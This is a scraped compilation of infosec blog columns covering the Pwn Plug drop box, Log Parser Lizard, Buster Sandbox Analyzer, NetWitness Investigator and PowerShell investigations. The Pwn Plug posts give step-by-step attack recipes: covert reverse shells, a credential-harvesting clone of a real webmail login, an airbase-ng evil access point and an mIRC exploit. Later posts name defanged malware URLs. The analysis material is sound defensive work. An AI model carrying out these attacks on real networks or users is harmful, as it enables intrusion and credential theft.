Sneak a Pwn Plug into a physical location, plug it in, and properly configured it phones home allowing you reverse shell access via a number of possible stealth modes. You can then set up a variety of exploit activities and/or run scanners or do specific social engineering activity I am about to demonstrate. The results are collected on the device and you can then collect them over the established shell access.

First, imagine the Pwn Plug hidden at the target site, lurking amongst all the other items usually plugged in to a power strip, hiding behind a desk in so innocuous a fashion so as to go easily undetected. Figure 2will send you scurrying about your workplace to ensure there are none in hiding as we speak.

Figure 2: The Pwn Plug looking so innocent 
I’ll walk through an extremely fun example with Pwn Plug but first you’ll need to ensure access. Commercial Pwn Plug users benefit from the Plug UI but those rolling their own with Pwn Plug CE can still phone home. Have a favorite flavor of reverse shell pwnzorship? Plain old reverse SSH is available or shell over DNS, HTTP, ICMP, SSL, or via 3G if you have the likes of an O2 E160.
The supporting scripts for reverse shell on the Pwn Plug are found in /var/pwnplug/scripts.
On your SSH receiver (Backtrack 5 recommended) I suggest checking out the PwnieScripts for Pwnie Express from Security Generation. @securitygen even has a method for setting up reverse SSH over Tor. I configured the Pwn Plug for HTTP because who doesn’t allow HTTP traffic outbound? J

Figure 3: Have shell, will pwn
Access established, time to pwn. One of my all-time favorite collections of mayhem is the Social Engineer Toolkit (SET). You will find SET at /var/pwnplug/set. Change directories appropriately via your established shell and run ./set.  You will be presented with the SET menu. I chose 2. Website Attack Vectors, then 3. Credential Harvester Attack Method followed by 2. Site Cloner (SET supports both HTTP and HTTPS). In an entirely intentional twist of irony I submitted http://mail.ccnt.com/igenus/login.php to SET as the URL to clone. Mind you, this is not a hack of the actual site being cloned so much as it is harvesting credentials via an extremely accurate replica wherein usernames and passwords are posted back to the Pwn Plug.
The test Pwn Plug was set up in the HolisticInfoSec Lab with an IP address of 192.168.248.23.
Imagine I’ve sent the victim a URL with http://192.168.248.23 hyperlinked as opposed to http://mail.ccnt.com/igenus/login.php and enticed them into clicking. Now don’t blink or you’ll miss it; I froze it for you in Figure 4.
Figure 4: SET harvesting from Pwn Plug
 After passing credentials the victim is then redirected back to the legitimate site none the wiser.
All the while, because you have shell access, you can gather results at your discretion. SET has a nice report generator and writes out to XML or HTML.
This is the tip of the iceberg for SET, and a mere fraction of the chaos you can unleash in whisper quiet mode via Pwn Plug. There are simply too many options to do it much justice in such short word space so as mentioned earlier I’ll continue the conversation on the HolisticInfoSec blog.

In Conclusion

I had a blast testing Pwn Plug, this is me after spending days doing so.


 If you make your living as penetration tester or need a really capable demonstration tool for social engineering awareness and prevention training, Pwn Plug is for you. Grab yourself a Sheevaplug, download Pwn Plug CE and enjoy yourself (with permission)!
Ping me via email if you have questions (russ at holisticinfosec dot org).
Cheers…until next month.

Acknowledgements

Dave Porcello, CEO and Technical Lead, Pwnie Express

More Mayhem with Pwn Plug

$
0
0
In my last post regarding Pwn Plug I discussed the features available to those of you who build your own with a Sheevaplug and Pwn Plug Community Edition.
Here I'll give you an overview of some of the additional pwntastic upside you'll benefit from should you choose to buy Pwn Plug Wireless, 3G, or Elite. Wireless will get you an external 1000mW USB ALFA, 3G offers am O2 E160, and an Elite includes 16GB SDHC card for extra storage (along with all the goodies you get with Wireless & 3G). All commercial versions  include support and the Plug UI which makes setup insanely simple. I configured the Pwn Plug I tested for 802.11 evil with the ALFA as seen in Figure 1.

Figure 1: Pwn Plug Wireless
In the Pwn Plug UI (HTTPS over port 8443 by default) I clicked Basic Setup, then Evil AP Config. Figure 2 shows the AMIEVIL SSID coming to life.

Figure 2: Am I evil?
This is a GUI configuration method for airbase-ng, specifically airbase-ng -P -C 30 -c 3 -e AMIEVIL -v mon0.
Then all you need to do is follow with Karmetasploit via ./msfconsole -r karma.rc and you're off. "Karmetasploit is a great function within Metasploit, allowing you to fake access points, capture passwords, harvest data, and conduct browser attacks against clients."
In addition to all the MSF3 functionality you'd expect you can also utilize David Kennedy's Fast Track. I ran  ./fast-track.py -i, selected 6. Exploits, then 7. mIRC 6.34 Remote Buffer Overflow Exploit. Figure 3 show my Windows XP SP 3 victim coming aboard for pwnzor.

Figure 3: mIRC pwn


With you Pwn Plug firmly established on your target network your recon options are also endless with an 802.11 interface enabled. Figure 4 shows Kismet happily enumerating from the Pwn Plug.

Figure 4: Kismet
So much fun, so little time. For those of you with penetration testing duties that include social engineering and red teaming tactics, I strongly suggest you explore the Pwnie Express site for yourself and the Pwn Plug options and features. You will not be disappointed.



MIR-ROR 2.0 released

$
0
0

MIR-ROR 2.0 has been released as the project has benefited from Jon Mark Allen's (ubahmapk) many contributions, giving MIR-ROR some much needed attention. 
MIR-ROR, or Motile Incident Response - Respond Objectively, Remediate, is a security incident response specialized, command-line script that calls specific Windows Sysinternals tools, as well as some other useful utilities, to provide live capture data for investigation.
You can easily enhance MIR-ROR to your liking with whatever command line tools you find useful. 
For incident response resource, we’ve found it indispensable.
Windows Systinternals licensing prevents us from bundling the tools in a distribution package; you’ll have to retrieve them for yourself. You can download the complete Sysinternals Suite, along with the other utilities needed, and unpack in a preferred directory on your system (C:\tools\MIR-ROR). Check fetch.txt for everything you need to download.
Please feel free to submit suggestions or fixes via Issue Tracker and we'll review potential updates for future releases. 
You can read the complete ISSA Journal article, MIR-ROR: Motile Incident Response - Respond Objectively, Remediate, here.

toolsmith: Log Parser Lizard

$
0
0








Prerequisites
Windows

Introduction
At RSA Conference 2012 I gave a presentation called Evil Through The Lens of Web Logs. This presentation is built on research I’m conducting for a SANS Gold paper for graduate school and pays particular attention to SQL injection and Remote File Include attacks. One of the tools discussed as very useful for analysis tactics is Log Parser Lizard. You’re probably familiar with Log Parser, but I’ll bet you didn’t there was a great GUI-based tool with which to leverage its raw power with ease. Log Parser Lizard (LPL) is the brainchild of Dimce Kuzmanov, a Macedonian software engineer, who started Lizard Labs in 1998. In 2006 while also working as a part time sysadmin on financial systems, Dimce recognized that he was using Logparser on a daily basis for creating reports, analyzing logs, automatic error reporting, transferring data with txt files, etc. Over time his collection of queries became unmanageable and difficult to maintain so he created LPL for his personal use and because, having benefited from free software himself, wanted to release a useful freeware product to give back to the community. While LPL very successfully harnesses Log Parser’s capabilities Dimce firmly believes that as a great UI it help users learn and organize their queries with less effort. When he added log4net and regex input support the Logparser community really began to embrace LPL. LPL releases are a bit sporadic, usually based on a few new features, bug or code fixes and future releases are planned but not with a known frequency. Today LPL has a user base of about 2000 installations each month based on trend analysis for the last three years and approximately 80000 users worldwide.
The current production release of LPL is 2.1 and features include:
·         Ability to organize queries along with an improved source code editor that includes enhanced source navigation and analysis capability, syntax-highlighting, automatic source code completion, method insight, undo/redo, bookmarks, and more
·         Support for Facebook Query Language (FQL). This feature was introduced to help Facebook developers organize their queries
·         Code snippets (code templates) and constants. Log Parser Lizard also supports “constants” binding to static/shared properties from Microsoft .Net
·         Numerous other user-interface features including advanced grid with filtering and grouping as well as support for charts without requiring a Microsoft Office installation as is a dependcy for  a standalone instance of Logparser
·         Support for printing and exporting results to Excel and PDF documents
o   For registered users ($26.51 USD)
·         Support for inline VB.Net code to create LogParser SQL queries
Inline VB.net support allows you to drop your code between <% and %> marks; it will then be executed and the resulting string will be replaced in the query. Lizard Labs believes this feature will be very useful for LPL users. Before parsing logs you can move-copy-rename files, download via FTP, shutdown IIS, etc. You can also use .Net data types like DateTime for arithmetic operations and/or System.Environment settings in query parameters.

As I write this I’m testing the beta for LPL 2.5 and the new feature set includes:
·         Conditional field formatting (color, font, size, image) to identify required information. As an example, you can set the conditions to change error colors to red, warnings to yellow, etc. or highlight a specific field if it contains a string value of interest
·         Store and organize queries in SQL Server database for ease of use among multiple users and computers in an organization as well as backups, auditing and all other benefits that database storage allows
·         Excel-style row filtering
·         Ability to add columns with Excel style formulas (with most Excel functions) and support for exporting in Excel 2007 format (more than 65365 rows)

What would a toolsmith article be without a tool roadmap so let’s not break a good habit, eh? LPL 3.0 will likely include out of the box queries for IIS web reports (as in other commercial log analysis products), support for query execution scheduling, reports sent via e-mail from LPL, command line support, a query builder tool, text file input format (where a single file is one record and fields can be extracted with RegEx or with Logparser functions), and improved log4net input format. As with most of the tools we discuss, Dimce is certainly open to good ideas for the product and welcomes feedback and ideas from the user community. In total fantasy land the future of LPL may even include queries “in the cloud”, an LPL ASP.net web app that can be installed right on the server, a web service supporting LPL, mobile apps that can use this service, and a global query dictionary that users can submit, comment and rate the queries. “The future’s so bright, I gotta wear shades.” Whoa, 80’s flashback, sorry. 


Using Log Parser Lizard

Installing Log Parser Lizard is so straightforward it doesn’t even warrant a section. Ensure you have Log Parser and .Net 3.5 installed, then execute the LPL installer. Finito.

As described above, I’ve been working on research for a paper which includes analysis of a mass SQL injection attack, well described in detail this past December by Mark Hofman on the SANS Internet Storm Center Diary. In addition to Mark’s analysis, this popular post included many comments and replies from readers who had suffered or noted the attack in their logs and even some helpful folks who submitted log samples. You likely remember the LizaMoon attack and the Lilupophilupop attack was quite similar. In both cases, injected sites offered a URL that then caused redirection to a fake antivirus offering. Specifically, was embedded in victim sites where sl.php bounced you to the likes of hxxp://ift72hbot.rr.nu, the on to rogue AV. I actually had to look up the .rr.nu TLD; it’s the Republic of Moldova, and has been implicated recently in massive SPAM campaigns as well as the current WordPress hacks (as of this writing). 
Figure 1 represents a victim site still exhibiting typical signs of compromise.

Figure 1: Lilupophilupop victim site
 Victim sites were most often running ASP.net apps on IIS with MS-SQL back-ends. It was quickly learned that a few identifying traits of the Lilupophilupop attack included the fact that a rather large hex blob that was evident in IIS logs. I’ve always found that checking logs for 500 errors when analyzing for SQL injection attacks can typically point you down the right path. Using a log file submitted by an ISC reader (anonymized for obvious reasons), I first built a query to seek ASP application errors from a default query included in LPL. I launched LPL, clicked IIS Logs, then ASP App Errors, replaced #IISW3C#in the FROM statement with the path to my anonymized log file, and finally clicked Run Query as seen in Figure 2. Email me if you’d like me send you the log file so you can experiment for yourself.

Figure 2: LPL parsing error messages
Using this query, including FROM D:\logs\lilupophilupop\ex111201anon.log WHERE (sc-status = 500) AND (cs-uri-stem LIKE '%.asp'), prior to being aware of lilupophilupop as a keyword or part of an injected URL, would have immediately narrowed the search vectors.
Also common to attacks of this nature might be a DECLAREstatement (defines variable(s)) visible in logs. A query as seen in Figure 3produced three results that included a DECLARE statement followed by a CAST (converts an expression of one data type to another) statement wherein an attempt to pass the hex blob to the backend was noted.

Figure 3: LPL parsing DECLARE statements
 I clicked one of the results from 78.46.28.97, chose Select All, then Copy, and dropped the content to a text editor. I then grabbed the hex from just after the CAST statement to just prior to the AS VARCHAR statement and copied into a Burp Suite decoder window and chose decode as ascii hex.
Figure 4 shows the converted attack string.

Figure 4: Burp decoder converts hex
Long and short of it, the attack loops through all columns in all tables and updates their value by adding JavaScript to point to hxxp://lilupophilupop.com/sl.php.
This took all of 5 to 10 minutes with LPL and a little experimentation. Yes, you can do all of this with Log Parser at the command line but if you’re looking for strong query management, tidy reporting exports including charts, and downright convenience, LPL is the way to go.

In Conclusion

Log Parser Lizard is one of those indispensable tools that treads lightly on your system but offers a huge bang for the buck. Free or $26? Puhleeze. Keep in mind that while I used an IIS log sample for the article you can throw LPL at generic XML, CSV, TSV and W3C based logs all day long. Download it and put it to good use right away. Dimce would love to hear from you, and I look forward to hearing your success stories.
Ping me via email if you have questions (russ at holisticinfosec dot org).
Cheers…until next month.

Acknowledgements

Dimce Kuzmanov, lead developer and founder, Lizard Labs

toolsmith: Buster Sandbox Anayzer

$
0
0














Prerequisites
Windows
Sandboxie 3.64 or later


Introduction
On April 10th, 2012 a new version of Sandboxie was released, and on April 16th so too was a new version of the Buster Sandbox Analyzer which uses Sandboxie at its core. Voila! Instant toolsmith fodder.
It’s been a few months since we’ve covered a malware analysis-specific tool so the timing was excellent.
Buster Sandbox Analyzer is intended for use in analysis of process behavior and system changes (file system, registry, ports) during runtime for evaluation as suspicious. You’ll find it listed among the Sandbox Tools for Malware Analysis on one of my favorite Internet resources, Grand Stream Dreams.
As always, I pinged the developer and Pedro Lopez (pseudonym) provided me with a number of insightful details.
He releases new versions of Buster Sandbox Analyzer on a fairly regular basis, version 1.59 is current as I write this. There’s an update mechanism built right into BSA; just click Updates then Check for Updates.  Pedro has recently improved static analysis and he’s always trying to improve dynamic analysis as he considers it the most important aspect of the tool.
For future releases the TO-DO list is short given over two years of constant development.
The following features are planned for:
A feature to analyze URLs in automatic mode.
Utilizing the information stored in the SQL database, a feature to generate statistics including used compressors, detected samples, and others.
Pedro continuously looks for new malware behaviors to include and improvements for the features already implemented. Your feedback is welcome here, readership.

Pedro was first motivated to create the tool thanks in large part to Sandboxie.
“Before I start coding Buster Sandbox Analyzer back in late 2010, I knew of Sandboxie already. I started using this great software around 2008 and had coded other utilities using Sandboxie as a file container so I knew already of the potential to write other types of programs for use with Sandboxie.
I created Buster Sandbox Analyzer because I didn't like that all publicly available malware analyzers were running under Linux. I like Linux based operating systems but I'm mainly a Windows user, so I wanted a malware analysis tool running under Windows. I knew Sandboxie was perfect for this task and with the help of Ronen Tzur (Sandboxie's author) it was possible to do it.”

Pedro cites several favorite use cases but two are stand outs for him:
1.Use the tool to know what files and registry modifications were created by a program. While this use case is not always directly related to malware analysis, it can be used by any user that wants such information regarding program behavior.
2.Use the tool to learn if a file (executable, PDF document, Word document, etc) exhibits malware-specific behavior.
Goes without saying, right?
Pedro reports that Buster Sandbox Analyzer suffers from a lack of user feedback (help change that!).
He’s not really sure how many people have used it to date or how many use it regularly but does recall one success story from a user on the Wilders Security Forums:
"I was shopping on Usenet for some tax software... I found it and ran it in the sandbox. As is my practice, I explored the installed files. Everything worked well. No obvious signs of infection, no writing to Windows, no start/run entries, and no files created in temp folders. But I still wasn't satisfied. I used Buster's program and reran the install...
The program logs were literally laced with created events, DNS queries to Russia, and many hidden processes. Needless to say, I kept it in the sandbox."

One message to convey to you, readers: a few versions ago Pedro introduced multi-language support; there are translations for next Spanish, Russian and Portuguese (Brazil) while a translation to German may be available soon. He would like to have translations for Italian, French, Japanese and Chinese and would be grateful if someone can contribute translations for these languages.
Given the likelihood that this article will be read by security professionals, Pedro welcomes anyone who tries out BSA and has suggestions, ideas, feedback, bugs, etc. to send them to his attention at malware dot collector at gmail dot com.


Configure BSA

Refer to installation and usage documentation on the BSA site as your primary source but you may find the BSA guidance at reboot.pro helpful but a bit dated. Consider it documentation reloaded. Actual installation of both Sandboxie and BSA is really straightforward but there are some configuration tricks worth paying attention to. After reading reboot.pro be sure to add the following to the Sandboxie default configuration file:
InjectDLL=C:\BSA\LOG_API.DLL
OpenWinClass=TFormBSA
NotifyDirectDiskAccess=y
Even more importantly, this assumes you’ve installed BSA in C:\bsa. If you choose differently, you must modify the Sandboxie configuration file accordingly. Avoid the Program Files directories on later versions of Windows given the need for administrative permissions to write there.
I’m a big fan of Windows shell integration with any tool that offers it. Under Options | Program Options | Windows Shell Integration select Add right-click action “Run BSA” and “Analyze in BSA”.
From Options set Common Analysis Options to include saving packet captures under Packet Sniffer via Save Capture To File. Be sure to select the correct adapter here as well. Note: BSA utilizes NetworkMinerConsole.exe for PCAP analysis. :-)
Also set your Report Options from the Options menu. I prefer HTML; you may also select PDF and XML.
You may also like the SQL options where you can write to a SQL database for analysis and report results.
Be sure to check out the additional features under the Utilities menu including submittal to online analyzers, file tools including disassembly, hashing, hex editing, renaming, signature check, scanning, and strings. There are also “explorers” for memory, PCAPs, PE files, processes, and registry hives as seen in Figure 1.

Figure 1: BSA Explorer features

Experiment and fine tune your settings. To then remember settings and load them automatically when the tool starts, select Options | Program Options | Save settings on exit. You can also save multiple configuration files via Options | Program Settings | Save Settings As so as to make use of different analysis patterns.
Lastly, and I imagine you knew I was going to say this, I run BSA in a Windows XP virtual machine and on a bare metal install of Windows 7 running SteadierState . Some malware not only knows when its running in a VM but it knows when it’s running in Sandboxie. If you suspect that’s the case, you can hide Sandboxie during a BSA run via Program Options | Hide Sandboxie.


Using BSA

I wanted to test BSA in two different capacities, one with a browser-borne exploit and one with a “normal” PE.
I am privileged to receive a daily report inclusive of a number of drive-by exploit vehicles so I am always rich in options for exploration, and
hxxp:// www.ugpag.cd/index.php?option=com_content&view=article&id=49&Itemid=75 was no exception.
To examine, I started BSA via bsa.exe in C:\BSA, tuned my BSA configuration to include some additional reporting options, clicked Start Analysis, right-clicked Internet Explorer and chose Run Sandboxed (given that Sandboxie is also integrated right into the Windows shell), and finally browsed to the ugpag.cd site. Once I willingly stepped through a few browser blocks (yes, I’m sure I want to do that),  the “infection” process completed and I chose Terminate All Programs by right-clicking on the system tray Sandboxie icon followed by Finish Analysis in BSA.
A few key elements jumped right out during BSA analysis and findings.
First, the site spawned an instance of Windows Media Player in order to “play” hcp_asx as seen in Figure 2.

Figure 2: Pwned site spawns Media Player for hcp_asx
Second, when reviewing Report.html, I quickly spotted to evil URLs (lukastroy.in & zdravyou.in) under Network services. Also note the Process/window information as seen in Figure 3.

Figure 3: BSA reporting reveals BlackHole URLs
A quick URLquery.net search for the URLs called gave me everything I needed to know.
Yep, BlackHole exploit kit. That was easy.

I used a Banload sample, (MD5: D03BF6AE5654550A8A0863F3A265A412) to validate BSA PE analysis capabilities. As expected, they were robust. The File Disassembler utility immediately discerned that the sample was UPX-packed. Figure 4 points out a number of revealing elements.

Figure 4: BSA API logging reveals Banload behavior
Of interest is the fact that a connection is made to hxxp://alessandrodertolazzi.hospedagemdesites.ws (187.45.240.69) in Brazil and attempts to download mac.rar. Banload/Banker commonly originates from Brazil so this comes as no surprise. This sample is a bit dated so the evilware hosted on Alessandro’s site is long gone, but you get idea. If you optimize your BSA reporting options to include Virustotal results, the Changes to file system section will include all the detections for created files as seen in Figure 5.

Figure 5: BSA reporting provides Virustotal results with created file
The opportunities for exploration are many with Buster Sandbox Analyzer and the fact that it’s free and regularly developed is of huge benefit to our community. Among the features you may find noteworthy and useful are BSA’s ability to BSA is able to automatically analyze a folder in a batch process as well as dump analyzed processes. BSA has moved to the top of my list for sandbox analysis, plain and simple.

In Conclusion

The combined strengths of Sandboxie and Buster Sandbox Analyzer make for a truly powerful combination and invaluable malware analysis platform. No reason for you to get started exploring right away. As always, do be careful playing with live samples and remember to provide feedback to the BSA project, your support is welcome.
Ping me via email if you have questions (russ at holisticinfosec dot org).
Cheers…until next month.

Acknowledgements

Pedro Lopez, lead developer, Buster Sandbox Analyzer






Bredolab author jailed, rehash of Bredolab analysis

$
0
0
Just read that the Bredolab botnet author was sentenced to 4 years in prison in Armenia.
In July 2010, when Bredolab was in it's heyday I used Netwitness Investigator to do analysis of a Bredolab-infected host. In honor of Georgy Avanesov's arrest, following is a reprint of the resulting toolsmith article. Bredolab samples and PCAPs available upon request via email or @holisiticinfosec. Netwitness is now in version 9.7.5.4, so some of the guidance and how-to herein may have changed.




Prerequisites
Windows operating system (XP/2003 or later)


Introduction
As I write this month’s column I’m on a plane returning from the 22nd Annual FIRST Conference in Miami. As always, in addition to a collection of the world’s finest computer incident response teams, there were a select number of vendors. I will be honest when I admit that I typically avoid conference vendor booths unless the swag is really good, but some of my favorites were in attendance including Mandiant and Secunia. When I noticed the NetWitness booth I was reminded of the suggestions I’d heard suggesting NetWitness Investigator as a toolsmith topic. During Robert Rounsavall’s FIRST presentation, Forensics considerations in next generation cloud environments, he made mention of the fact that the Terremark teams make use of NetWitness offerings on their high throughput network capture platforms. Incident responders, network analysts, and security engineers typically can’t get enough of good network capture tools; the reminder triggered by the NetWitness booth presence clearly indicated that the time had come.
Specifically, NetWitness Investigator is part of a suite of products offered by NetWitness that are designed to capture network traffic and use the resulting data for business and security problem analysis. Others include Administrator, Decoder, Concentrator, Broker, Informer, and the NwConsole. Most NetWitness applications are commercial offerings, but Investigator is freely available and quite useful.

Installing and configuring NetWitness Investigator
Installation is point and click simple. Accept defaults or modify installation paths as you see fit. You will need to register the Computer ID generated for the host on which you’re installing that is generated as part of the license key. Provide a valid email address; you’ll be sent a link to activate your installation for first use.
Keep in mind that by default NetWitness Investigator does phone home for new updates and will reach out to the NetWitness web service to offer you the most recent FAQs, News and Community posts in the
Welcome page. If you prefer otherwise select Edit, then Options, and uncheck Automatically Check for Updates as well as Allow Investigator to Reach Internet.
If you don’t have WinPcap installed you will be prompted to do so; WinPcap 4.1.1 is bundled with the installation package.
Under View be sure to enable the Capture Bar as it will present a Capture icon and Collection selector at the bottom of the NetWitness Investigator UI.
You can also pre-define the interface from which you’d like to capture via the Options menu as described above.

Using NetWitness Investigator

The NetWitness Investigator (NI) Welcome Page provides useful FAQ; read it as you get underway.
NI allows you to either capture data directly from the host network interfaces, including wireless adapters, or import network captures from other sources and its use is built around Collections. The free version of NI doesn’t offer Remote Collections as they are specific to retrieving data gathered by other NetWitness commercial offerings. That said you can create Local Collections.
Ctrl + L will pull up the new Local Collection UI, you can also click Collection, then New Local Collection from the menu bar or click the create icon from the Collection toolbar.
I called my collection bredolab (you’ll learn why shortly) and will refer to it hereafter.
Once you create a collection right-click it then connect to it.
You know have two options, capture or import.
Capture
To capture, use the Capture Bar, select the already-created Collection or create a new by collecting the Capture icon first. Once you click the Capture icon NI will capture network data until you click the Capture icon again to halt the process.
Import
Right-click the already-created Collection to add data via the Import Packets options.

Configuring NetWitness Investigator

Select a PCAP file from your local file system, and click Open.

I worked primarily with imported PCAPs, though testing NI’s capture capability proved successful. I did find that in resource-limited virtual environments capturing network traffic with NI causes fairly significant VM grind.
As I was testing NI in the toolsmith lab a golden opportunity to put it though its motions presented itself via the SANS ISC Diary. The Lenovo support site had been discovered to be compromised and propagating the Bredolab Trojan via an embedded IFRAME. As I had literally just been to the Lenovo site to update my laptop BIOS (I had not experienced the malicious behavior) I was pleased with the near real-time relevance and the opportunity to check NI against a new sample. The CyberInsecure article called out the exact malware URL that the IFRAME pointed to (hxxp://volgo-marun.cn/pek/exe.exe) so I grabbed it immediately via my malware sandbox VM. After firing up Wireshark on my VM server, I executed exe.exe (great name) and captured the resulting traffic.  I imported the resulting bredolab.pcap (email me if you’d like a copy) into NI and compared results against details provided in the Lenovo compromise article. While this is a really small PCAP it serves well in exemplifying NI features.

Claim: The malware “receives commands from C&C server with domain sicha-linna8.com”
Validation: Check. Right out of the gate we can see sicha-linna8.com as part of the Collection Navigation view, under Hostname Aliases.

Bredolab sample collection navigation

Left-click the hostname alias result to drill into it.
Right-click it to evoke bonus functionality such as SANS IP History, SamSpade, and CentralOps.
Drilling in the Hostname Alias entry reduces the Service Typefindings to just HTTP and DNS traffic which is useful as they are the primary services of interest with this sample. As seen in Figure 2, we can drill further into the single referenced DNS session. The resulting Session view, using the Hybrid option, shows us both a thumbnail view and session details. Further Contentoptions are presented in the lower pane with additional functionality such as, were it relevant, rebuilding instant messaging (IM) and audio, as well as mail and web content reconstruction. The Best Reconstruction option is tidy; it organizes into the three packets for the DNS session represented as the two request packets (as hex) and the response from server.

DNS session content
You can make use of Google Earth as well, if installed. But be sure to default your private IP addresses to your local latitude and longitude. As if we hadn’t already imagined or determined it so, sicha-linna8.com is attributed to the Russian Federation (RU).
Click the Google Earth icon in the Session view.
Satellite imagery does a fair job of bearing that out, although, but unless I’m mistaken Figure 4’s reference pointer looks to be more like China.

Google Earth view of DNS request domain location
Now, I’m just being silly here, but again NI justifies my being so with its capabilities.
As mentioned above, the malware “receives commands from C&C server”. Hmm, that sounds like a bot. Duh, ok Russ, prove it. Navigate back to the Collection summary via the URL window, scroll down to the Querystring reference and click [open]. See, I told you so.

Hello, I’m a bot
That would be the HTTP GET equivalent of calling home to the mothership and requesting mission orders. As if action=bot and action=reportweren’t enough for you, the fact that the Filename reference in Figure 5 is also controller.php really help you reach a reasonable conclusion.
By the way, Trend Micro’s Bredolab summary (not specific to this sample) will give a good understanding of its behavioral attributes, but there should be no surprises.

There are endless additional features including the use of breadcrumbs to help you leave a trail as you navigate through large captures, excellent reporting capabilities, as well as the ability export sessions to a file (PCAP, CSV, XML, HTML, etc.) or a new or different collection.
If you click Help, you’ll be offered the 168 page NetWitness Investigator User Guide, which will do this tool far more justice than I have. Consider it required reading before going too far down the rabbit hole on your own.

In Conclusion

There’s much more that I could have covered for you regarding NetWitness Investigator, would time and space have allowed it, but hopefully this effort will get you cracking with this tool if you haven’t already partaken.
NetWitness Investigator is really slick and I’m pleased enough with it to declare it a candidate for the 2010 Toolsmith Tool of the Year to be decided no later than January 2011.
Check it out for yourself and let me know what you think.
Cheers…until next month.

toolsmith: Security Investigations with PowerShell

$
0
0

Prerequisites
Windows, ideally Windows 7 or Windows Server 2008 R2 as PowerShell is native
There are 32-bit & 64bit versions of PowerShell for Windows XP, Windows Server 2003, Windows Vista and Windows Server 2008 as well.

Introduction
Windows power users have long sought strong fu at the command line. In the beginning, Bill said “Let there be shell.” And lo, there was command.com and cmd.exe. Then Jim said, there must be scripting support and automation, and thus the likes of Windows Script Host and WMIC were brought to light. But alas, there were challenges; no shell integration, no interoperability. Then unto thee was delivered the shell prophet Monad (see the Monad Manifesto), later renamed Window PowerShell in 2006.
In a nutshell, PowerShell is powerful. Alright, enough of the PowerShell parable.
Really though, any sysadmin running modern Windows platforms is likely using or has used PowerShell. Full disclosure: I work for Microsoft. But before you write me off as just being a fan boy, hear me out. Aside from all the administrative horsepower PowerShell provides it also lends significant punch to security-related investigations as part of incident response and/or forensic reviews.
As you know, I always prefer to “ask the expert” when it comes to toolsmith topics so I sought counsel from Ed Wilson (Microsoft Scripting Guy) regarding security investigations with PowerShell.

“Using Windows PowerShell to aid in security forensics is a no-brainer. First of all, Windows PowerShell is installed by default beginning with Windows 7, so the tool is likely to already be available. Second Windows PowerShell makes it extremely easy to collect the data you need to analyze. A very simple Windows PowerShell script (or a few Windows PowerShell commands) can dump the windows logs, take a snapshot of running services, processes, and gather system time. In addition, the script can collect any other logs you wish. The above can be done in just a few lines of easily readable code. When Windows PowerShell remoting is enabled (enabled by default on Windows Server 2012) there is no difference between running a command on one or a thousand different systems.
The real power begins, however, when you decide to parse the collected data. A number of Windows PowerShell cmdlets make trolling through massive amounts of XML, CSV, or even unstructured text a breeze. Whether you are parsing an offline Windows event log, a firewall log, or even a syslog gathered from a remote Unix machine the process remains the same. In short Windows PowerShell is the one tool you do not want to leave home (even virtually) without.” 

I pitch a straight fastball right in Ed’s wheelhouse and he drives it out of the park for me.
We’ll take on both of these scenarios as described by Ed:
·         Using PowerShell to dump Windows logs, assess running services, processes, and gather other useful system data.
·         Using PowerShell to parse collected data
In a case of shameless self-promotion I want to call out the benefits of tools that aid in culling evil from logs as described above. My recently posted SANS Reading Room paper for my GCIA Gold research effort, Evil Through The Lens of Web Logs discusses a number of tools to conduct such parsing activity but it fails to mention PowerShell. This is my chance to correct that shortcoming.

Using PowerShell

There are endless online PowerShell resources via the likes of TechNet, MSDN, CodePlex, and SANS-related content. Also check out Adam Bell’s great list on Lead, Follow, or Move. Rather than rehash such content, I’ll instead walk through an investigation using cmdlets and scripts that are directly relevant to the cause. Do remember that get-help from the PowerShell prompt is definitely your friend.
Caveat: I do not lay claim to any of the strings or commands included hereafter, they are mimicked and modified from the above mentioned resources or yanked right from Get-Help. This work is neither unique nor particularly creative. It is instead intended to help you recognize why PowerShell is so incredibly useful. To those true aficionados who swiftly recognize how much detail I’m leaving out, feel free to share your feedback and I’ll add it the related blogpost and/or accept comments.
Imagine a malicious person has created a backdoor on a Windows system using tini, has renamed tini to a trusted file name, created a service to ensure that it always runs, and has changed the listening port to 31337 (original, I know). I’m operating from the premise that we already know the basic gist of the attacker activity and will focus much more on how to discover it with PowerShell. So, what PowerShell juju can we utilize to rebuild the trail of malfeasance?
First, fire up a PowerShell prompt. Start | Programs | Accessories | Windows PowerShell followed by your preferred PowerShell (x86 or 64-bit) or Integrated Scripting Environment (ISE). Note: when you bring PowerShell scripts on your system that have been created by other users, you may need to check script execution policy. By default, unsigned PS1 files are prevented from execution for reasons of inherent risk to the system as untrusted. As long as you are cognitive of this risk you can do the following, in order, from the PowerShell prompt.
1)  Get-ExecutionPolicy
2)  Set-ExecutionPolicy where policy is one of four options:
a.       Restricted - default execution policy, doesn’t run scripts, interactive only
b.      AllSigned - runs scripts, scripts and configuration files must be signed by trusted publisher
c.       RemoteSigned – Like as AllSigned when script is downloaded apps such as IE and Outlook
d.      Unrestricted – goes without saying

Let’s start with running services. You have reason to believe that the attacker’s backdoor is running as a known service name. Begin with get-service. Results are a little busy so let’s narrow it down. Get-Service | Where-Object {$_.status -eq "running"}thins the crowd a bit by presenting only running services, but still nothing leaps right out. Sometimes the service description or lack thereof is revealing.  There is no parameter defined via get-service to pull a service description but it can be done via get-wmiobject win32_service | format-list Name, Description. The result is again busy but I found my culprit as seen in Figure 1.

Figure 1: Service description gone wild
Now that we know the name of our faux service in this imaginary scenario, let’s explore possibly related processes with Get-Process | Out-Gridview. This will spawn a second window with a conveniently interactive table view of the results. If we operate on the premise that a malicious process name TapiSrv might be in play, we can filter the grid view or we can drill in for it specifically with Get-Process TapiSrv as seen in Figure2.  

Figure 2: Malicious process
Let’s determine the TapiSrv file information and process owner. Get-Process TapiSrv –fileversioninfo tells us the TapiSrv resides in C:\tmp\TapiSrv.exe. Helpful, but wait, there’s more. (get-wmiobject win32_process | where{$_.ProcessName -eq 'TapiSrv.exe'}).getowner() | Select -property domain, user will tell us that I am he who propagates the evil and write-host ([WMI]'').ConvertToDateTime((Get-WmiObject win32_process | where{$_.ProcessName -eq 'TapiSrv.exe'}).creationdate)will tell us the date and time I created it as seen in Figure 3 (no you do not get to see my domain name).

Figure 3: Process owner, creation date & time
The Get-Member cmdlets will help you determine which properties and methods are available to you where the likes of get-wmiobject win32_process | get-member told us that getownerConvertToDateTime, and creationdate were all available to us via get-wmiobject.

Figure 2 gave us something useful to explore further in the Id, also known as the PID.
We can take information such as 9512 and throw Microsoft MVP Shay Levy’s Get-NetworkStatistics at it. When you want to add PowerShell modules such as Shay’s that aren’t native you can use import-module as follows after saving the code from your preferred resource as a PSM1 file:
